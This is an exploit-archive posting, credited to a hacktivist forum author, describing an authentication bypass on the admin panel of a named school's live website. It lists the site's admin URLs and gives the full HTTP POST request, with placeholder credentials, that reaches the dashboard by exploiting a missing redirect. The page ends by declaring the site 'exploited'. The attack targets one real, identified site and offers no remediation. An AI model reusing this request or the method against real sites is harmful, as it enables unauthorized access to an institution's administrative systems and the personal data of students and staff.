Aradhana Public School NoRedirect Admin Bypass

2023.02.19

sc0field (TR)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title : Aradhana Public School NoRedirect Admin Bypass
# Exploit Date : 02.17.2023
# Exploit Author : sc0field
# Forum : HACKTIVIZM.ORG
Admin Panel ->
http://apsrohru.com/admin/index.php
Admin Dashboard ->
http://apsrohru.com/admin/dashboard.php
Exploit Method :
http://apsrohru.com/admin/index.php
this page we send requests with burp suite
We are sending this request from the proxy point :
POST /admin/dashboard.php HTTP/1.1
Host: apsrohru.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Origin: http://apsrohru.com
Connection: close
Referer: http://apsrohru.com/admin/index.php
Cookie: PHPSESSID=cpjpi29etdj7qaigoultdp8986
Upgrade-Insecure-Requests: 1
username=1&password=1&user-login=true
and exploited

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Aradhana Public School NoRedirect Admin Bypass

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.